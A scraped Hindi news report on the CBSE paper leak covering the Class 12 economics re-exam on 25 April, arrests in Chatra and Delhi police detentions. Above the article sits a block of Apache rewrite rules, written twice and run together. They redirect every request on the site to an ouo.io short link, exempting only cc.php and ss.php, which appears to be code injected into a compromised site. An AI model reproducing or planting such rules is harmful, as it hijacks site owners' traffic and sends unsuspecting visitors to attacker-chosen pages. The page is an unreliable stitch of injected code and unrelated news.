
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 317
Nextनई दिल्ली। सीबीएसई पेपर लीक मामले में शिक्षा सचिव अनिल स्वरूप ने पुनः परीक्षा का एलान कर दिया है। 12वीं के लीक हुए इकोनॉमिक्स के पेपर की पुनः परीक्षा 25 अप्रैल को होगी। वहीं 10वीं की परीक्षा पर फैसला आना बाकी है। उन्होंने कहा कि दिल्ली और हरियाणा में 10वीं का पेपर लीक हुआ था। ऐसे में अगर जरूरत पड़ी तो जुलाई में पुनः परीक्षा सिर्फ दिल्ली और हरियाणा में कराई जा सकती है। बता दें कि इससे पहले मानव संसाधन विकास मंत्री प्रकाश जावड़ेकर ने कल कहा था कि सीबीएसई जल्द ही सोमवार या मंगलवार को नई तारीखों की घोषणा करेगा। प्रकाश जावड़ेकर ने कहा था कि 'ऐसी कोई लीक नहीं हो, यह सुनिश्चित करने के लिए एक नयी व्यवस्था सोमवार से लागू हो जायेगी।
गौरतलब है कि 28 मार्च को पेपर लीक होने के बाद बोर्ड ने 10वीं के गणित और 12वीं के अर्थशास्त्र के पेपर को रद्द कर दिया था। 10वीं का गणित का पेपर 28 मार्च को ही हुआ था जबकि 12वीं का अर्थाशास्त्र का पेपर 26 मार्च को आयोजित हुआ था। दोनों पेपरों के प्रश्न पत्र सोशल मीडिया पर लीक होने के बाद इन्हें कैंसल कर फिर से कराने का निर्णय लिया गया। सीबीएसई पेपर लीक मामले में झारखंड के चतरा से चार छात्रों को गिरफ्तार किया गया है। दूसरी ओर दिल्ली पुलिस की क्राइम ब्रांच ने गुरुवार को 25 लोगों को हिरासत में लेकर पूछताछ की। इनमें 13 स्कूली छात्र, 5 कॉलेज छात्र, 5 टय़ूशन पढ़ाने वाले शिक्षक और 2 अन्य शामिल हैं। केंद्रीय मंत्री प्रकाश जावड़ेकर ने भी भरोसा जताया कि दोषियों को बख्शा नहीं जाएगा और उनके खिलाफ सख्त कार्रवाई की जाएगी। केंद्र सरकार मामले की तह तक जाएगी।